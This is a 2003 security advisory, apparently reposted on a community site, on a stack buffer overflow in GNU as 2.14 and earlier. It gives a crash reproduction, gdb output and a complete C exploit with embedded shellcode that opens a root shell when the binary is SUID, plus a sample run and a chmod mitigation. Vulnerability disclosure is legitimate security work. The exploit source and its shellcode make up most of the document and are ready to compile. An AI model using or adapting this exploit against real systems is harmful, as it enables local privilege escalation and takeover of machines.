Copy Link
Add to Bookmark
Report

01 - Stack Buffer Overflow on GNU (assembler) 2.14 and previous, for Linux

eZine's profile picture
Published in 
Advisory
 · 1 year ago

No System Group - Advisory #01 - 19/08/03

DESCRIPTION

The GNU Binutils are a collection of binary tools.

'as' is the GNU assembler.

More informations at: http://sources.redhat.com/binutils/

DETAILS

$ /usr/bin/as `perl -e 'print "A" x 2005'` 
Segmentation fault

Now we proceed to open gdb to view what may have occurred.

$gdb /usr/bin/as 
GNU gdb 5.3
Copyright 2002 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-slackware-linux"...
(no debugging symbols found)...
(gdb) r `perl -e 'print "A" x 2005'`
Starting program: /usr/bin/as `perl -e 'print "A" x 2005'`
Assembler messages:
Error: can't open AAAAAAAAAAAAAAA..........AAAAA...
..........AAAAAAA for reading
(no debugging symbols found)...(no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) i r ebp eip esp
ebp 0x41414141 0x41414141
eip 0x41414141 0x41414141
esp 0xbffff090 0xbffff090
(gdb)

Here as you can see we are able to gain the return address.
Return : 0xbffff090.

EXPLOIT

I have done minimal testing on this.

It has been tested on Slackware 9.0 and Red Hat 7.2

------------------- as_exp.c -------------------- 
/* Linux 'as' buffer overflow

This will give you a root shell if /usr/bin/as is SUID,
which isn't by default.

Use: ./as_exp [offset]

Try offsets 300-400
Tested on Slackware 9.0 and Red Hat 7.2

by CoKi <coki@interlap.com.ar>
No System Group - http://www.nosystem.com.ar
*/


#include <stdio.h>

#define OFFSET 350

long esp(void);

int main(int argc, char *argv[]) {

char buf[2005];
char shellcode[]=
"\xb0\x31\xcd\x80\x89\xc3\x31\xc0\xb0\x17\xcd\x80"
"\x31\xdb\x31\xc0\xb0\x17\xcd\x80"
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x89\x46\x0c\x88\x46\x07"
"\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb"
"\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";
int i, off;
long ret;

if(argc>1) {
off = atoi(argv[1]);
}

else off = OFFSET;

ret = (esp() - off);
printf("\n'as' buffer overflow by CoKi\n");
printf("----------------------------\n\n");
printf("Return Address: 0x%lx\nOffset: %d\n\n", ret, off);

for(i=0;i<2005;i+=4)
*(unsigned long *)&buf[i]=0x90909090;

*(unsigned long *)&buf[2005 - 4]=ret;
*(unsigned long *)&buf[2005 - 8]=ret;

memcpy(buf + 2005 - strlen(shellcode) - 8, shellcode, strlen(shellcode));
execlp("/usr/bin/as","as",buf,0);
}

long esp(void){
__asm__("movl %esp,%eax");
}
------------------- as_exp.c --------------------

$ gcc -o as_exp as_exp.c
$ ./as_exp 390

'as' buffer overflow by CoKi
----------------------------

Return Address: 0xbffff002
Offset: 390

Assembler messages:

Error: can't open ............ 
.................../bin/sh ..... for reading

sh-2.05b# id
uid=0(root) gid=100(users) groups=100(users)
sh-2.05b#

This will give you a root shell if /usr/bin/as is SUID, which isn't by default.

SOLUTIONS

Remove suid permissions on the program if it has them

#chmod u-s /usr/bin/as


REFERENCES

http://www.nosystem.com.ar/advisories/advisory-01.txt

CREDITS

Discovered by CoKi <coki@interlap.com.ar>

No System Group - http://www.nosystem.com.ar

next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT